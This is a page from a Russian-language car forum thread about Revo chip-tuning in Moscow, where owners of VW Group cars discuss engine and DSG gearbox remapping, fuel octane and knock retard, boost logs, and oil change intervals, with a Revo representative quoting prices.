+ Ответить в теме
Страница 83 из 91 ПерваяПервая ... 33 73 81 82 83 84 85 ... ПоследняяПоследняя
Показано с 821 по 830 из 909

Тема: Чип-тюнинг от компании Revo в Москве!

GTI-Racing Буб has a spectacular aura about Буб has a spectacular aura about Буб has a spectacular aura about Аватар для Буб
    Машина
    AUDI S3 8P Revo performance
    Как много вопросов в одном сообщении :)))))!
    Я не из Рево, но вроде на 90% доп. скидок сейчас нет, просто не из чего видимо уже вычитать...

ЗЫ: В субботу прошил свою новую машину. Всё как всегда круче некуда! Кайфую как ребенок!
    Спасибо Амет, Мотя, Кирилл! Вы - лучшие :D

GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Машина
    Эгоист GTI 5
    Цитата Сообщение от _SVR_ Посмотреть сообщение
    Ну вот и я решил потратится и ощутить 1 stage. Понятно что не сезон, но 2 года уже откладываю и на акцию решился. В выходные буду в Екате, заеду к Роме. Стоит ли шить коробас при городском испольщзовании сколько стоит?
    Пару раз в год, приходится заправлятся 95 G-drive и еду тихонько до заправки с 98 =), какую прошивку залить в таком случае, большие ли откаты на 95 при прошивке под 98. На стоке снимал логи, откаты минимальны. Если не топить на 95м стоит ли заморачиваться?
    К новогодней скидке 25 % есть ли доп. скидка от GTI-клуба?
    Коробас шей однозначно. Как показывает практика, в Москве газпромовский бензин большие откаты дает. Что 98 что 95

GTI-Racing jenyz is on a distinguished road Аватар для jenyz
    Машина
    SEAT Ibiza Cupra Bocanegra
    Пока не было возможности шить коробку, я очень хотел перепрошить. Но как появилась возможность перепрошить, то у меня спросили - что мне не нравится в текущей версии. И вот тут я задумался, а что? - ответа не на шел, кпп сухая дсг7.

Собственно вопрос, зачем шить кпп?))

GTI-Racing koct88 is on a distinguished road Аватар для koct88
    Машина
    Golf mk6 GTI
    Цитата Сообщение от jenyz Посмотреть сообщение
    Пока не было возможности шить коробку, я очень хотел перепрошить. Но как появилась возможность перепрошить, то у меня спросили - что мне не нравится в текущей версии. И вот тут я задумался, а что? - ответа не на шел, кпп сухая дсг7.

Собственно вопрос, зачем шить кпп?))
    с дсг7 я б ничего не делал) и тем более не чиповался... они и без чипов сыпятся :)
    машина куплена 1 ноября 2013

Новичок Revo is on a distinguished road Аватар для Revo
    Машина
    Golf R
    Ну вот и я решил потратится и ощутить 1 stage. Понятно что не сезон, но 2 года уже откладываю и на акцию решился. В выходные буду в Екате, заеду к Роме. Стоит ли шить коробас при городском испольщзовании сколько стоит?
    Пару раз в год, приходится заправлятся 95 G-drive и еду тихонько до заправки с 98 =), какую прошивку залить в таком случае, большие ли откаты на 95 при прошивке под 98. На стоке снимал логи, откаты минимальны. Если не топить на 95м стоит ли заморачиваться?
    К новогодней скидке 25 % есть ли доп. скидка от GTI-клуба?
    стоимость программы для дсг стоит 24.000 рублей (по акции 18.000). прошивать или нет - решать Вам. Прошитая коробка в Д режиме работает плавнее и адекватнее.

не знаем как в Челябинске, а в Москве газпром торгует плохим бензином. Но не в этом суть. Если иногда приходится заливать 95-ый, то можно сразу под него прошиться и не переживать каждый раз. Так как с программой под 98-ой на 5-м бензине будут большие откаты. Да и в целом мы настоятельно не рекомендуем так делать :)

между собой скидки не суммируются, поэтому получится только 25% :)

GTI-Racing Буб has a spectacular aura about Буб has a spectacular aura about Буб has a spectacular aura about Аватар для Буб
    Машина
    AUDI S3 8P Revo performance
    Парни, спасибо за чип дсг.
    Машину не узнать. Однозначно всем советую это делать!

GTI-Racing _SVR_ is on a distinguished road Аватар для _SVR_
    Машина
    GTImk6_DSG_2.0
    Прошился в пятницу, полный отчет тут на драйве, Снял логи, 2 вопроса:
    1) Имеется недодув турбины в среднем на 0,2 бар вместо запрашиваемых например вместо 2190 - 1940, 2330 -2040, вместо 1930 - 1740, но логи снимал с вкл ЕPС, и скользко было часто букс. На стоке летом всё четко разница десятки милибар.
    2) Расход воздуха в пике 206 грамм в сек, для настройки под 95 с 98 в баке это нормально?
    Что посоветуете, куда посмотреть?

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    1) Имеется недодув турбины в среднем на 0,2 бар вместо запрашиваемых например вместо 2190 - 1940, 2330 -2040, вместо 1930 - 1740, но логи снимал с вкл ЕPС, и скользко было часто букс. На стоке летом всё четко разница десятки милибар.
    2) Расход воздуха в пике 206 грамм в сек, для настройки под 95 с 98 в баке это нормально?
    С такой температурой масла могу посоветовать, менять его еще чаще чем 7500. Масло при такой температуре будет к 7500 шляпой.
    С расходом на ХХ вот что мне было бы неприятно.....может дело не в софте. А обороты холостого не выросли случайно после стока на ХХ ?
    песок сыпется....не останавливайтесь на достигнутом !

Новичок Revo is on a distinguished road Аватар для Revo
    Машина
    Golf R
    1) недодув может быть связан с есп, которая душила двиг.
    2) 206 грамм - это порядка 268 сил, так как коэффициент 1.3

---------- Сообщение добавлено в 14:39 ---------- Предыдущее сообщение размещено в 14:38 ----------

Цитата Сообщение от BON Посмотреть сообщение
    С такой температурой масла могу посоветовать, менять его еще чаще чем 7500. Масло при такой температуре будет к 7500 шляпой.
    С расходом на ХХ вот что мне было бы неприятно.....может дело не в софте. А обороты холостого не выросли случайно после стока на ХХ ?
    если говорить о кастрюле, то да. с мотюлем, шеллом или мобилом никаких проблем нет. это нормальная рабочая температура для ТСИ моторов.

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Цитата Сообщение от Revo Посмотреть сообщение
    если говорить о кастрюле, то да. с мотюлем, шеллом или мобилом никаких проблем нет. это нормальная рабочая температура для ТСИ моторов.
    Если говорить вообще о маслах, то моторов чистых на кастроле настоящем на ойл клаб с примерами вскрытия много. Как впрочем и на других маслах. А вот примеров кокса, шлама и лакирования внутри от беспечности владельца затягивающего со сменой масла полно....и мотюль или шелл тут не причем.
    Если интересно почитать как мотюль "прожаривали" и как он держит температуру велком на бмв.ливджёрнал блог.
    Я не про нормальную температуру масла для этого мотора говорю, она такая и есть, а то как помочь себе и мотору этот фактор учесть )))
    С какой скоростью идут химические реакции и выпадают присадки от температуры масла можно прочитать и посмотреть на этих двух уважаемых ресурсах.

Если масло настоящее, то для таких машин, и особенно форсированных смена масла на 7500 км дополнительное испытание.
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 83 из 91 ПерваяПервая ... 33 73 81 82 83 84 85 ... ПоследняяПоследняя